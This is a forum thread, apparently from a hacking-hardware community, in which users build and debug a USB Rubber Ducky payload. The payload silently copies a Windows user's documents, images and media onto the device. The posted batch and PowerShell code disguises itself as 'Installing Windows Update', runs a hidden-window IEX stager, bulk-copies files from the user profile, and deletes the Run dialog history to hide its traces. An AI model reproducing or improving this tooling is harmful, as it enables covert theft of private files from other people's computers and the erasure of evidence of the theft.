if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.xls %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.xlsx %dst% >>nul)

REM Image extensions
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.gif %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.jpg %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.jpeg %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.JPEG %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.png %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.tiff %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.psd %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.webp %dst% >>nul)

REM audio extensions
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.mp3 %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.m4a %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.ogg %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.wav %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.wma %dst% >>nul)

REM video extensions
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.3gp %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.avi %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.divx %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.mp4 %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.mpeg %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.ogm %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.wmv %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.mov %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.vob %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.webm %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.xvid %dst% >>nul)

REM Folder to copy OneDrive
REM Document extensions
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.csv %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.doc %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.docx %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.odt %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.ods %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.odg %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.odp %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.pdf %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.pps %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.txt %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.tex %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.ltx %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.rtf %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.xls %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.xlsx %dst% >>nul)

REM Image extensions
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.gif %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.jpg %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.jpeg %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.JPEG %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.png %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.tiff %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.psd %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.webp %dst% >>nul)

REM audio extensions
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.mp3 %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.m4a %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.ogg %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.wav %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.wma %dst% >>nul)

REM video extensions
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.3gp %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.avi %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.divx %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.mp4 %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.mpeg %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.ogm %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.wmv %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.mov %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.vob %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.webm %dst% >>nul)
if Exist %USERPROFILE%\OneDrive (xcopy /C /Q /G /Y /S %USERPROFILE%\OneDrive\*.xvid %dst% >>nul)

REM Folder to copy Music
REM Document extensions
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.csv %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.doc %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.docx %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.odt %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.ods %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.odg %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.odp %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.pdf %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.pps %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.txt %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.tex %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.ltx %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.rtf %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.xls %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.xlsx %dst% >>nul)

REM Image extensions
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.gif %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.jpg %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.jpeg %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.JPEG %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.png %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.tiff %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.psd %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.webp %dst% >>nul)

REM audio extensions
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.mp3 %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.m4a %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.ogg %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.wav %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.wma %dst% >>nul)

REM video extensions
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.3gp %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.avi %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.divx %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.mp4 %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.mpeg %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.ogm %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.wmv %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.mov %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.vob %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.webm %dst% >>nul)
if Exist %USERPROFILE%\Music (xcopy /C /Q /G /Y /S %USERPROFILE%\Music\*.xvid %dst% >>nul)

REM Folder to copy Searches
REM Document extensions
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.csv %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.doc %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.docx %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.odt %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.ods %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.odg %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.odp %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.pdf %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.pps %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.txt %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.tex %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.ltx %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.rtf %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.xls %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.xlsx %dst% >>nul)

REM Image extensions
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.gif %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.jpg %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.jpeg %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.JPEG %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.png %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.tiff %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.psd %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.webp %dst% >>nul)

REM audio extensions
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.mp3 %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.m4a %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.ogg %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.wav %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.wma %dst% >>nul)

REM video extensions
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.3gp %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.avi %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.divx %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.mp4 %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.mpeg %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.ogm %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.wmv %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.mov %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.vob %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.webm %dst% >>nul)
if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.xvid %dst% >>nul)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit

 

Link to comment
Share on other sites
PoSHMagiC0de Rookie

PoSHMagiC0de

Posted
Posted

I do not have my Rubber Duck anymore but have a BashBunny and a script in Powershell for smbexfiltration.  It can be located in my BBTPS project at the link below.  You just need create a oneline stager to get the patch to the Rubber ducky and then get-content the script, invoke it and then run the function with the base path to the files, path to where the files are going on the rubber ducky and an array of extensions or filenames you want from that folder.  Of course all the extensions you want will make the command longer unless you build a wrapper script for it that will pass it all the extensions or modify the script to invoke the command at the end of it with the parameters.

https://github.com/PoSHMagiC0de/BBTPS/tree/master/jobs/totalp0wn

Yeah, it is called smbexfil but will take any kind of path you give it.  Only called it that because I pass it a UNC path in the project to exfil via the SMB path to BB.

Link to comment
Share on other sites
bg-wa Newbie

bg-wa

Posted
Posted

Hey Luca,

You can cut down this code, by putting your file types into an array, then loop through that array, executing at each object your 

if Exist %USERPROFILE%\Searches (xcopy /C /Q /G /Y /S %USERPROFILE%\Searches\*.[YOUR FILE EXTENSION FROM ARRAY] %dst% >>nul)

https://stackoverflow.com/questions/8880603/loop-through-an-array-of-strings-in-bash

This will trim up your code for each location.  To make it even smaller, you should throw that line into a new function, then call it, passing your location and file-type.  As a positive side effect, will also make the script much easier to test and maintain.

https://stackoverflow.com/questions/6212219/passing-parameters-to-a-bash-function 

Link to comment
Share on other sites
lucaM Newbie

lucaM

Posted
  • Author
Posted

Hi PoSHMagiC0de and bg-wa

Thanks for your answers.

I looked at the code of PoSHMagiC0de, if I misunderstood, refers to this piece of code: 

EXAMPLE
   Invoke-SMBExfil -targetfolder "$env:userprofile\Documents" -destUNC "\\192.168.1.4\foldershare\targetfolder" -filenames @("*.gif","*.jpg","*.docx","*.xlsx")

I tried to put these codes inside the e.cmd file, but they do not work, I'm definitely missing something 

"$env:userprofile\\Documents\" @(\"*.docx\",\"*.pdf\",\"*.jpg\",\"*.gif\",\"*.xlsx\")"

"$env:userprofile\\Documents\" (\"*.docx\",\"*.pdf\",\"*.jpg\",\"*.gif\",\"*.xlsx\")"

 

Later I thought to "merge" together with the existing code, I entered these codes, but they do not work. 

if Exist %USERPROFILE%\\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\\Documents\ @(\"*.docx\",\"*.pdf\",\"*.rtf\",\"*.txt\",\"*.xlsx\") %dst% >>nul)

if Exist %USERPROFILE%\\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\\Documents\ (\"*.docx\",\"*.pdf\",\"*.rtf\",\"*.txt\",\"*.xlsx\") %dst% >>nul)

 

Thanks bg-wa for the suggestions, I tried these codes but do not work, even here I'm definitely wrong something. 

if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.("*.docx" "*.pdf" "*.rtf" "*.txt" "*.xlsx") %dst% >>nul)

if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.("*.docx","*.pdf","*.rtf","*.txt","*.xlsx") %dst% >>nul) %dst% >>nul)

if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.("*.docx\","*.pdf\","*.rtf\","*.txt\","*.xlsx\") %dst% >>nul) %dst% >>nul)

if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.[\"*.docx\",\"*.pdf\",\"*.rtf\",\"*.txt\",\"*.xlsx\"] %dst% >>nul) %dst% >>nul)

if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.["*.docx\","*.pdf\","*.rtf\","*.txt\","*.xlsx\"] %dst% >>nul) %dst% >>nul)

 

I continue with tests, I do not know the programming languages, I try the combinations of the various codes.

Link to comment
Share on other sites
lucaM Newbie

lucaM

Posted
  • Author
Posted

I managed to solve, I did a lot of tests and tried between codes, at the end something worked :-)

Still inside the e.cmd file I entered this code 

REM Create folder to receive files
mkdir %dst%\txt

REM Copy (inside the newly created folder) all the files present in the current user's PC, for that specific extension
cd %USERPROFILE% & FORFILES /S /M *.tx* /C "cmd /c xcopy /Y @path %dst%\txt"

REM Creates a log file containing the paths of the files saved in the folder.
cd %USERPROFILE% & FORFILES /S /M *.tx* /C "cmd /c echo @path" >> %dst%\txt.log"

All the content of e.cmd is shown below, of course the parts concerning the file extension will have to be modified 

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

REM Create folder to receive files
mkdir %dst%\txt
REM Copy (inside the newly created folder) all the files present in the current user's PC, for that specific extension
cd %USERPROFILE% & FORFILES /S /M *.tx* /C "cmd /c xcopy /Y @path %dst%\txt"
REM Creates a log file containing the paths of the files saved in the folder.
cd %USERPROFILE% & FORFILES /S /M *.tx* /C "cmd /c echo @path" >> %dst%\txt.log"

mkdir %dst%\doc
cd %USERPROFILE% & FORFILES /S /M *.do* /C "cmd /c xcopy /Y @path %dst%\doc"
cd %USERPROFILE% & FORFILES /S /M *.do* /C "cmd /c echo @path" >> %dst%\doc.log"

mkdir %dst%\png
cd %USERPROFILE% & FORFILES /S /M *.pn* /C "cmd /c xcopy /Y @path %dst%\png"
cd %USERPROFILE% & FORFILES /S /M *.pn* /C "cmd /c echo @path" >> %dst%\png.log"

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit

 

Can you tell me if the code has errors? or if it is possible to improve it again.

Thanks for your patience

Link to comment
Share on other sites
PoSHMagiC0de Rookie

PoSHMagiC0de

Posted
Posted (edited)

Man, been a busy week.  Yeah, the script I recommended is to be used as almost a complete replacement to using CMD files.  It takes inclusions as arrays and is completely powershell.  What I meant by using it is on the RubberDucky you are limited to interactivity with your commands unlike the BB so with that script you will need to create a launcher script to keep the quack command small so it will be a two stager only so you can use the 1st stage as your config script. 

# This is DuckExfil.ps1

function Invoke-DuckExfil
{
    $exfilfolder = "$env:userprofile\Documents\"
    $duckDrive = (gwmi -class win32_volume -f {label='-'}).Name
    $payloaddir = "payloads\"
    
    $duckpayloads = join-path $duckDrive $payloaddir
    $duckloot = join-path $duckdrive "loot folder on duck\"
    
    #Documents
    $docs = @("*.csv", "*.doc", "*.docx", "*.odt", "*.ods", "*.odg", "*.odp", "*.pdf", "*.pps", "*.txt", "*.tex", "*.ltx", "*.rtf", "*.xls", ".xlsx")
    
    #Images
    $img = @("*.gif", "*.jpg", "*.jpeg", "*.png", "*.tiff", "*.psd", "*.webp")
    
    #And other formats that I will not include because it is monotonous.
    
    #Combine into 1 arraylist    
    $filetypes = [System.Collections.ArrayList]::new()
    $filetypes.Addrange($docs)
    $filetypes.Addrange($img)
	
    #Get the smbexfil script and run it with parameters.
    IEX (gc (join-path $duckpayloads "Invoke-SMBExfil.ps1") -encoding String | Out-String)
    Invoke-SMBExfil $exfilfolder $duckloot $filetypes
    
    $wsh = New-Object -ComObject WScript.Shell
    $wsh.SendKeys('{CAPSLOCK}')
    sleep -m 250
    $wsh.SendKeys('{CAPSLOCK}')
    sleep -m 250
    $wsh.SendKeys('{CAPSLOCK}')
    sleep -m 250
    $wsh.SendKeys('{CAPSLOCK}')
    
    Remove-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
}

And the quack command should be something like this: 

STRING powershell -NoP -W hidden -C {$duck=(join-path (gwmi -class win32_volume -f "label='-'").Name "payloads\DuckExfil.ps1");IEX (gc $duck -encoding String | Out-String);Invoke-DuckExfil}

I do not know what the twin duck label is so where the labels are at is what the label the RB twinduck shows up as.  With the the ducky commands to launch a cmd window done first and then the string command above you should get the window disappearing and files copying ending with that keyboard light sequence when done.  Config of paths and stuff done in the DuckExfil.ps1 file.  Just showing another option.

Edited by PoSHMagiC0de
Fix launcher.
Link to comment
Share on other sites
lucaM Newbie

lucaM

Posted
  • Author
Posted

Thanks for your help.

I created (inside the micro sd for the USB Rubber Duck) the payloads folder, inside this folder I inserted the file DuckExfil.ps1.

I created the "inject.bin" file obtained from the code 

STRING powershell -NoP -W hidden -C {$duck=(join-path (gwmi -class win32_volume -f "label='-'").Name "payloads\DuckExfil.ps1");IEX (gc $duck -encoding String | Out-String);Invoke-DuckExfil}

 

I transferred the files inside the USB Rubber Duck.

Connect the USB Rubber Duck to the PC, it opens "run windows" with relative string of code, opens the powershell and minimizes.

No files are copied. Am I wrong? do I have to change some parameters inside the DuckExfil.ps1 file?

With which language is the DuckExfil.ps1 file written? I would like to learn a computer language, I thought that maybe I could start from this script you wrote, in order to make it change independently.

Thanks for your help

Link to comment
Share on other sites
lucaM Newbie

lucaM

Posted
  • Author
Posted

I look at the code to try to understand how it works.

In my ignorance I think I have to change something to make it work.

Unfortunately, even after the change does not work.


I modified this part: 

#Get the smbexfil script and run it with parameters.
    IEX (gc (join-path $duckpayloads "Invoke-SMBExfil.ps1") -encoding String | Out-String)
    Invoke-SMBExfil $exfilfolder $duckloot $filetypes



With this:
  

#Get the smbexfil script and run it with parameters.
IEX (gc (join-path $duckpayloads "Invoke-DuckExfil.ps1") -encoding String | Out-String)
Invoke-DuckExfil $exfilfolder $duckloot $filetypes



it's wrong ? why can not I create the folder with the copy of the files?

Thanks for your help

Link to comment
Share on other sites
PoSHMagiC0de Rookie

PoSHMagiC0de

Posted
Posted

One line you do have to change is put in the name of the loot folder on the duck SSD.  In the duckexfil file look for the $duckloot variable and it will have in quotes to enter the name of the folder to exfil to.  It also assumes you have the scripts in a "payloads" folder right off the root of the ducky.  If that is not the case, that folder name will need to be changed in the duckexfil also under the $payloaddir variable.  I also mentioned I do not know what label twin duck gives itself when it mounts as storage so you will need to get that and change the 2 labels that have "-" in them to be the label twinduck gives.  One is in the one line launcher and the other is in the duckexfil to get the duck drive.

 

How it should work is the one liner launcher should launch powershell and get the drive the for the Twin duck, combine it with the "payloads\DuckExfil.ps1" file and use get-content encoding it all as string into memory and then outputting as one solid string rather than string array. (Posh 2.0 did not have the "-raw" switch for get-content to get files as is so it almost always return arrays that cannot be invoked as scripts so I pipe it to Out-String to make it a single string). 

Invokes that script which loads the function into memory.

You then run the function that will build the paths in memory it needs to access the RD twinduck drive and perspective folders.

You also build a list of file wildcards to get.

With all that the script pulls in and invokes the smbexfil script which puts the function into memory and then it runs the function with parameters it needs.  Now, if you wish to see it in action for testing, remove the "-w hidden" parameter from the launcher the window will not vanish.  Good for testing to see if the script is running or quits immediately.  I would also (for testing) monitor the duck folder to see if files are going there.

